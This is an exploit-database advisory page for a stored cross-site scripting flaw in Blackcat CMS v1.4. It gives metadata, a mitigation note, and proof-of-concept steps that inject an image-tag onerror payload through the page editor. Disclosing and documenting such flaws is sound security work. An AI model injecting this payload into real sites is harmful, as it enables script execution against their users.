header-logo
Suggest Exploit
vendor:
Blackcat CMS
by:
Mirabbas Agalarov
5
CVSS
MEDIUM
Stored XSS
79
CWE
Product Name: Blackcat CMS
Affected Version From: v1.4
Affected Version To: v1.4
Patch Exists: NO
Related CWE:
CPE: a:blackcatdevelopment:blackcat_cms:1.4
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

Blackcat Cms v1.4 – Stored XSS

The Blackcat CMS version 1.4 is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious code into the application, which will be executed when the targeted user views the affected page.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper output encoding.
Source

Exploit-DB raw data:

Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1

Navigation

Suggest Exploit

Services By CQR